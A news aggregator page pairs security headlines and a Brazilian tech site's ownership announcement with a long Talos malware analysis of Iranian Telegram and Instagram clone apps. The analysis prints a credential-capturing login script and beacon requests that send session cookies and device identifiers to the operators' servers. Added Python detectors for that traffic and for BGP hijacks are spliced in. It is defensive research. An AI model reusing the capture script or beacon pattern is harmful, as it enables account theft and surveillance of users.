News aggregator

Popular WooCommerce WordPress Plugin Patches Critical Vulnerability

THN - Wed, 07/11/2018 - 07:01
If you own an eCommerce website built on WordPress and powered by WooCommerce plugin, then beware of a new vulnerability that could compromise your online store. Simon Scannell, a researcher at RIPS Technologies GmbH, discovered an arbitrary file deletion vulnerability in the popular WooCommerce plugin that could allow a malicious or compromised privileged user to gain full control over the

Meio Bit version 3.0: a fresh start (under new management!)

MeioBit - Tue, 06/11/2018 - 21:28

Dear readers, it is with pleasure and joy that I have great news to share with you. As announced in Meio & Mensagem, Meio Bit is under new management: the site has been sold to Thiago Mobilon, owner of Tecnoblog and a personal friend of mine, someone I trust to keep the site on the right track. Yes, we pulled an April Fools' joke about this a few years ago, but this time it's for real!

The transition started a few months ago, but it won't change our editorial line at all; in fact, it hasn't changed a comma so far. This is another chapter in the story of Meio Bit, a site created in 2004 by cousins and technology enthusiasts Leo Faoro and Luiz Du Nercolini, which will celebrate 15 years online next year and has become one of the most respected in the country.

I wasn't one of the founders, but I was invited to join the partnership about 10 years ago because of my work at Digital Drops, and since then I have worked tirelessly so that MB could close more deals, reach a bigger audience and become more successful.

In the middle of this story, I still found time to work at Globo for a few years, where I helped found and build TechTudo, which today is the largest technology site in Brazil and is also a source of pride for me. These are two pieces of work that truly fill me with joy for having done them.

The future of Meio Bit

Well, enough talking about me; this post is to hand the MB baton over to the new owner for good. As I said at the beginning of the post, Mobilon has been my personal friend since we created our technology blogs last decade, and he is someone who likes and, above all, cares as much about the future of Meio Bit as I do.

Besides sharing my long-standing passion for MB, something essential for running this site, Mobilon is a born entrepreneur, has a great capacity to get things done, and was able to turn a personal blog like the Tecnoblog of old into the true editorial powerhouse it is today.

I had already received other offers for the site, but none of them guaranteed me that the site would be kept exactly as it is, which for me was the only essential thing. There is no one else in the market who could leave me more at ease about taking over Meio Bit. Mobilon has my endorsement and my complete trust to maintain and further improve the level of the site, which today is online with the same team, the same editorial line, and carefully crafted texts every day. That is MB's true calling.

Don't think I'm leaving MB; I'll stay around here, writing a few posts every day. The only difference is that now I'll have more time to research and write my texts more calmly, without having to worry about the bureaucratic side of the business.

Like Cardoso and the site's other authors, I'll keep writing with pleasure and joy at MB, as I have done for the last 10 years. With the sale, I'll also have more free time to make lots of videos on my channel, as well as writing posts on my sites DD and Blog de Brinquedo.

This isn't the first change in MB's ownership, and just like the last time, the ship will sail on the same way, moving forward toward excellence, toward the good content made of the quality texts that we believe are the site's great differentiator. Many say blogs are dead, but we show every day that this is far from true.

But will nothing change in the new MB? Well, some things will change, but for the much better. The new design and the new brand, which I personally loved and found much more minimalist and very strong, are the most evident novelty, but there will be others. First of all, I'd like to welcome André Fogaça (formerly of Canaltech and TudoCelular) and Vivi Werneck (formerly of TechTudo), who are working with us on the team.

Acknowledgements

One of the most special things about having had the privilege of running MB all this time was being able to do incredible work with great companies (tech or otherwise) such as HP, Microsoft, Samsung, Asus, Disney, TIM and Claro, among many others. To all of them, a huge thank you for the trust placed in the site and in me.

I can't end this post without personally thanking the site's former partners, Leo, Du, Marcellus and Moardib, who invited me to write here, and also the site's current authors, who were always by my side fighting this just battle: Dori, Gilson, Max and Ronaldo, you guys are the best, thank you very much for everything!

A special thanks also goes to Carlos Cardoso, whose incredible texts I read before I ever dreamed of joining MB, who has since become a good friend, and who is a guy who has always worn this site's jersey, no matter the situation.

When it comes to MB, nobody on this team is as important as Cardoso. Quoting Caetano, to me he is the most perfect translation of Meio Bit. It has been a pleasure and a source of pride to have worked, and to be able to keep working, with him, who besides being a friend is also the best inventor of project names I know.

Before I finish, my biggest thanks go to you, who are reading these lines. MB would be nothing without you, our dear reader. It's no exaggeration: the readers here enrich every text on the site with their intelligent comments, always in a very healthy debate.

Okay, every now and then there are some fights, but that's part of any community. Our readers and our community are a priceless asset that no other technology site in Brazil has or will have, at least in my humble opinion. Just as a football team is nothing without its fans, Meio Bit would be nothing without our readers. Thank you very much for everything, and please keep reading, commenting and sharing our posts even more.

Live long and prosper, Meio Bit! Thank you for everything, and onward together!

Also read Mobilon's post: Tecnoblog closes acquisition of Meio Bit (and this time it's not April 1st)

The post Meio Bit version 3.0: a fresh start (under new management!) appeared first on Meio Bit.

The Pirate Bay Like 9 Best Torrent Sites (Updated Nov 2018)

THN - Tue, 06/11/2018 - 16:35
The Pirate Bay torrent search engine is one of the world's most famous and best torrent sites. But it has been caught second time mining digital currencies using visitors' computers. Like many popular torrent sites, the pirate bay also uses mining to make money without informing its users. But this time a tiny message on its homepage clarifies some terms of service but gives no option to

Flaws in Popular Self-Encrypting SSDs Let Attackers Decrypt Data

THN - Tue, 06/11/2018 - 07:21
We all have something to hide, something to protect. But if you are also relying on self-encrypting drives for that, then you should read this news carefully. Security researchers have discovered multiple critical vulnerabilities in some of the popular self-encrypting solid state drives (SSD) that could allow an attacker to decrypt disk encryption and recover protected data without knowing the

Persian Stalker pillages Iranian users of Instagram and Telegram

Talos - Mon, 05/11/2018 - 14:55
This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres and Vitor Ventura, with contributions from Eric Kuhla.

Introduction
State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.
Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.


Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." They are not malicious enough to be classified as malware, but are suspicious enough to be considered potentially unwanted programs (PUPs). This kind of software is difficult to detect, as it typically fulfills the functions the user expects of it (e.g., sending messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.
Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while, targeting secure messaging apps. Some actors are also hijacking BGP routes. This technique redirects traffic at the routing level, with the affected routers never verifying the origin of the new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and the hijack is easily detectable, so the new routes won't be in place for very long.
Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran, its nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.
A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. The same rule applies to the cloned applications: installing applications from untrusted sources implies a certain degree of risk that users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.
Tactics
Functionality enhancement applications (grey)
Andromedaa.ir and Cambridge Universal Academy
Description of andromedaa.ir

Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.
While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.
Whois information for andromedaa.ir
The andromedaa.ir domain is registered with the [email protected] email address. This is the same email address used to register other domains for the cloned Instagram and Telegram applications (see other sections below).
Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.
Partial list of the domains found
We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.
Certificate information
This SSL certificate analysis revealed an additional domain, flbgr[.]com, whose whois information was privacy protected. Based on the low prevalence of those values in the SSL certificate, Talos associates this domain with the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.
List of domains associated with the same IP address
Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.
Certificate information
Description of Cambridge Universal Academy

Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.

Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, offers visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.


Business model


All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.
Price list (original HTML errors were kept, translation by google.com)
While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing copy that highlights the benefits of using this service rather than others.
Lik3.org marketing (translation by google.com)
It's worth noting that the operators state that they will never ask for the customer's Instagram password and that all of the site's users are real. The reality is that the operator doesn't need the customer's Instagram password, because a "like" on the customer's post is performed from other users' accounts, not from the customer's own.
Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.
The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.
Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.
Application examples
Follower Begir Instagram iOS application
The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.
First screen after logging in
The developer added some features such as virtual currency and Persian language support, among others.
Certificate information
The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.
document.addEventListener('click', function() {
  try {
    var tu = document.querySelector('[name="username"]');
    var tp = document.querySelector('[name="password"]');
    var tpV = (typeof tp == 'undefined') ? '' : tp.value;
    var tuV = (typeof tu == 'undefined') ? '' : tu.value;
  } catch (err) {
    var tuV = '';
    var tpV = ''
  }
  var bd = document.getElementsByTagName('body')[0].innerText;
  var messageToPost = {
    'pu': tuV,
    'pp': tpV,
    'bd': bd
  };
  window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);
},false);

The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the followerbegir.AuthorizationUserController userController:didReceiveScriptMessage() function. Afterward, the application authenticates on Instagram servers.
During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
Host: v1.flbgr.com
SESSIONID: [redacted]
HEADER: vf1
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.
The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.
The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:
POST /start/fl.php?apk=35&m=ios HTTP/1.1
Host: ndrm.ir
HEADER: vf1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0

If the version is not up to date, the application redirects the user to the andromedaa store:
Instructions to trust the developer certificate
The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.
Ozvbegir (ozvdarozv) application

The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.
Application description (translation by Google Translate)
We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.
Most recent Ozvbegir certificate
Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information were clearly false.
Older versions certificate
Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.
Ozvbegir classes structure
In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.
Update check and reply
Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and a link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.
The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and, coincidentally, it is the one with the ability to upgrade the application on mobile devices.
The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.
Phone number request
This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.
Sessions created on a single phone
The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
HEADER: bt6
ADMIN: web
Host: v1.ozvdarozv.com
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)
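The two ping.php beacons (the Follower Begir iOS request to v1.flbgr.com above and the Ozvbegir Android request to v1.ozvdarozv.com just shown) share a recognisable shape: a known backend host, a /users/ping.php or /start/fl.php endpoint, device and account identifiers in the query string, non-standard headers such as HEADER, IOS, TOKEN and NUM, and, for the iOS apps, a percent-encoded Persian application name in the User-Agent. The following detection routine is an added example and not Talos tooling: it parses raw HTTP request heads as a proxy or capture tool would log them and reports which of those traits each request exhibits. The sample requests are reconstructed from the post's redacted captures with the placeholder REDACTED in place of the redactions; only the hosts, paths and header names named in the post are used as indicators.

```python
"""Flag clone-app beacon traffic by its hosts, endpoints, headers and identifiers.

Added example, not Talos tooling. Samples are reconstructed from the post's
redacted captures (REDACTED stands in for the redacted values).
"""
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators taken from the post (written defanged there, normalised here).
BEACON_HOSTS = {"v1.flbgr.com", "v1.ozvdarozv.com", "ndrm.ir"}
BEACON_PATHS = {"/users/ping.php", "/start/fl.php"}
ODD_HEADERS = {"HEADER", "IOS", "TOKEN", "NUM", "ADMIN"}  # added by the clones
IDENTITY_PARAMS = {"imei", "phone", "tg_id", "access_hash",
                   "user_details", "tokenNumber"}        # device/account ids


@dataclass
class Finding:
    host: str
    reasons: List[str] = field(default_factory=list)
    decoded_user_agent: str = ""


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request head into (method, target, headers)."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, target, headers


def inspect_request(raw: str) -> Optional[Finding]:
    """Return a Finding listing every beacon trait seen, or None if clean."""
    _method, target, headers = parse_request(raw)
    host = headers.get("Host", "").lower()
    parts = urlsplit(target)
    params = parse_qs(parts.query)
    finding = Finding(host=host)

    if host in BEACON_HOSTS:
        finding.reasons.append(f"known clone backend host {host}")
    if parts.path in BEACON_PATHS:
        finding.reasons.append(f"beacon endpoint {parts.path}")
    leaked = sorted(IDENTITY_PARAMS & set(params))
    if leaked:
        finding.reasons.append("device/account identifiers in query: " + ",".join(leaked))
    odd = sorted(ODD_HEADERS & set(headers))
    if odd:
        finding.reasons.append("non-standard headers: " + ",".join(odd))
    if "SESSIONID" in headers:
        # The post notes this header carries a valid Instagram session cookie.
        finding.reasons.append("Instagram session material sent in SESSIONID header")
    # The iOS apps send their Persian display name percent-encoded as the UA.
    finding.decoded_user_agent = unquote(headers.get("User-Agent", ""))
    if any("\u0600" <= ch <= "\u06ff" for ch in finding.decoded_user_agent):
        finding.reasons.append("percent-encoded Persian application name in User-Agent")
    return finding if finding.reasons else None


# Constructed samples: "[redacted]" values from the post replaced by REDACTED.
SAMPLE_FLBGR = """POST /users/ping.php?m=ios&access=REDACTED&apk=35&imei=REDACTED&user_details=REDACTED&tokenNumber=REDACTED HTTP/1.1
Host: v1.flbgr.com
SESSIONID: REDACTED
HEADER: vf1
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Content-Length: 0
"""
SAMPLE_NDRM = """POST /start/fl.php?apk=35&m=ios HTTP/1.1
Host: ndrm.ir
HEADER: vf1
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1/35 CFNetwork/893.14.2 Darwin/17.3.0
"""
SAMPLE_OZV = """GET /users/ping.php?access_hash=REDACTED&phone=REDACTED&tg_id=REDACTED&m=d&apk=570&imei=REDACTED&brand=motorola&model=Moto+G+%285%29 HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
HEADER: bt6
ADMIN: web
Host: v1.ozvdarozv.com
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)
"""
BENIGN_REQUEST = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
"""

if __name__ == "__main__":
    for raw in (SAMPLE_FLBGR, SAMPLE_NDRM, SAMPLE_OZV, BENIGN_REQUEST):
        hit = inspect_request(raw)
        print(hit.host, "->", "; ".join(hit.reasons)) if hit else print("clean")
```

The host and path lists are the brittle part of this check and go stale as the operator registers new domains; the identifier, header and User-Agent traits are what keep catching the next repackaged build, so a rule that alerts on two or more reasons rather than on the host alone is the better starting point.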

We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.
Channel information
Bitgram_dev


Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications, AseGram and BitGram, on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.
AseGram and BitGram on Google Play
Publisher information
Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.
Application examples
AseGram


The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.
AseGram certificate
This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: this software uses a proxy defined at the Telegram package layer in order to intercept traffic.
Set proxy code
Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.
The service org.pouyadr.Service.MyService starts upon boot. This calls MessagesController.getGlobalMainSettings() from the original Telegram package and changes the settings to include the proxy configuration.
The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.
The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications. This application creates a service that can't be disabled just by closing the application and that starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, it uses the back end of the Telegram clone called "Advanced Telegram" (or "Golden Telegram"). This application is available at cafebazaar.ir, an Iranian state-sanctioned Android application store.
Advanced Telegram cafebazaar page (translation by Google Translate)
It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find a legitimate use case in which an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.
The application also contains code to use SOCKS servers located in several countries, which can be used to circumvent the ban. However, during our research we never saw these being used. On the other hand, when the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.
Fake websites
Spoofed Telegram Websites
The most straightforward approach to gain access to an end-user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.
Fake Telegram login page
This domain was registered on July 25, 2017. The tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address [email protected][.]com used to register this domain as well as other domains, and the domain's passive DNS (pDNS) records, suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by another cybersecurity firm, Clearsky. Upon further inspection of the web page source code, it appears that the website was built using the GitHub project called "Webogram"; there were also strings in the source page suggesting this website's display was designed for iPhones.
Source code GitHub.com reference
Newly identified Charming Kitten domains
While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.
These domains were also registered using the same modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.

This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.
BGP Routing Anomalies
Background
While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcements, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requesting network or autonomous system.
BGP is used across the internet to assist with the selection of the best routing path. It's important to note that route selection can be influenced at the ISP level through the various attributes BGP uses to choose among routes. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:
The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.
These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."
While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no security mechanism other than optional methods such as MD5 passwords for neighbours, IPsec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. This could result in some traffic passing through a predetermined, or sub-optimal, route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. The effectiveness of a BGP hijacking session is measured by the number of BGP peers who receive the update message: the more peers who receive it, the more likely traffic is being routed through the alternative, sub-optimal path pre-configured by the actor.
Pre-Planned Routing Activity from ASN 58224
One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, Iranian ASN 58224 announced an update for the prefix 185.112.156.0/22. The ASN that sent the update message is owned by the Iranian telecommunications provider Iran Telecommunication Company PJS.
The range potentially being hijacked is associated with the Hungarian internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected the event, which lasted two hours and 15 minutes until a new update message was disseminated. While this event was small in scale, it could have been a trial run for a larger BGP hijack attempt.
More significant BGP anomalies originated from the same ASN 58224 a month later. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as "more specific" prefixes at exactly the same time, down to the second, affecting communications with Telegram. Because forwarding follows the longest matching prefix, routers that accepted this update began sending some traffic destined for Telegram's servers through ASN 58224. This campaign was particularly effective: a large number of BGPmon peers observed it, suggesting that it propagated throughout the region. Just like the event one month prior, routers received a corrected update message two hours and 15 minutes later, ending the hijack.
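The two anomaly shapes described above (an exact prefix announced by the wrong origin AS, and several more-specific carve-outs of a monitored block announced at the same second) are exactly what a route-monitoring alert should catch. The script below is an added example, not code from the Talos post or from BGPStream/BGPmon. It assumes a table of expected origin ASNs per prefix, which in practice would come from RPKI ROAs, IRR route objects or your own allocation records; the DoclerWeb prefix is the one named in the post, the other monitored blocks are RFC 5737 documentation ranges standing in for Telegram's real prefixes (which the post does not list), and every "owner" ASN is a placeholder from the RFC 5398 documentation range. The update feed is constructed sample data.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Update:
    """One BGP announcement as a route collector would record it."""
    timestamp: str    # UTC time of the update, e.g. "2018-07-30T06:28:25Z"
    prefix: str       # announced prefix
    origin_asn: int   # last ASN in the AS_PATH, i.e. who claims to originate it
    peers: int        # how many collector peers saw the update


# Who is allowed to originate what. In production this comes from RPKI ROAs,
# IRR route objects or your own allocation records. 185.112.156.0/22 is the
# DoclerWeb range named in the post; the two RFC 5737 ranges stand in for
# Telegram prefixes the post does not list. ASNs are RFC 5398 placeholders.
EXPECTED_ORIGIN = {
    "185.112.156.0/22": 64496,
    "203.0.113.0/24": 64497,
    "198.51.100.0/24": 64497,
}


def classify(update, expected=EXPECTED_ORIGIN):
    """Return the hijack indicators raised by a single update.

    "origin_mismatch": the exact monitored prefix announced by an ASN other
                       than its expected origin.
    "more_specific":   a sub-prefix of a monitored block announced by a foreign
                       ASN; longest-prefix match means it beats the real route.
    A more-specific announced by the legitimate origin is ordinary traffic
    engineering and is deliberately not flagged.
    """
    net = ipaddress.ip_network(update.prefix, strict=True)
    findings = []
    for known, owner in expected.items():
        block = ipaddress.ip_network(known)
        if block.version != net.version or update.origin_asn == owner:
            continue
        if net == block:
            findings.append("origin_mismatch")
        elif net.subnet_of(block):
            findings.append("more_specific")
    return findings


def coordinated_more_specifics(updates, expected=EXPECTED_ORIGIN, min_prefixes=2):
    """Group suspicious more-specifics by (timestamp, origin ASN).

    Several carve-outs of monitored space appearing in the same second from the
    same origin is what makes a deliberate hijack more likely than a leak.
    Returns {(timestamp, origin_asn): [prefixes]} for groups of at least
    min_prefixes announcements.
    """
    groups = defaultdict(list)
    for u in updates:
        if "more_specific" in classify(u, expected):
            groups[(u.timestamp, u.origin_asn)].append(u.prefix)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_prefixes}


# Constructed sample feed. The first record mirrors the June 30 event; the four
# at 06:28:25 mirror the shape of the July 30 event; the last two are benign.
SAMPLE_UPDATES = [
    Update("2018-06-30T07:41:28Z", "185.112.156.0/22", 58224, 9),
    Update("2018-07-30T06:28:25Z", "203.0.113.0/25", 58224, 90),
    Update("2018-07-30T06:28:25Z", "203.0.113.128/25", 58224, 90),
    Update("2018-07-30T06:28:25Z", "198.51.100.0/25", 58224, 90),
    Update("2018-07-30T06:28:25Z", "198.51.100.128/25", 58224, 90),
    Update("2018-07-30T06:28:25Z", "185.112.156.0/22", 64496, 300),  # owner re-announces
    Update("2018-07-30T06:30:00Z", "203.0.113.0/25", 64497, 300),    # owner's own TE
]


if __name__ == "__main__":
    for u in SAMPLE_UPDATES:
        print(u.timestamp, u.prefix, "AS%d" % u.origin_asn, classify(u) or "ok")
    for (ts, asn), prefixes in coordinated_more_specifics(SAMPLE_UPDATES).items():
        print("coordinated more-specifics at %s from AS%d: %s" % (ts, asn, ", ".join(prefixes)))
```

Feeding this a real collector stream (for example the JSON records BGPStream or RIPE RIS publish) only requires mapping each record onto `Update`; the peer count is carried so that a downstream rule can weight a finding seen by ninety peers above one seen by a single peer, which is how the post itself judges the two events.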

How BGP hijacking could have enabled computer network operations
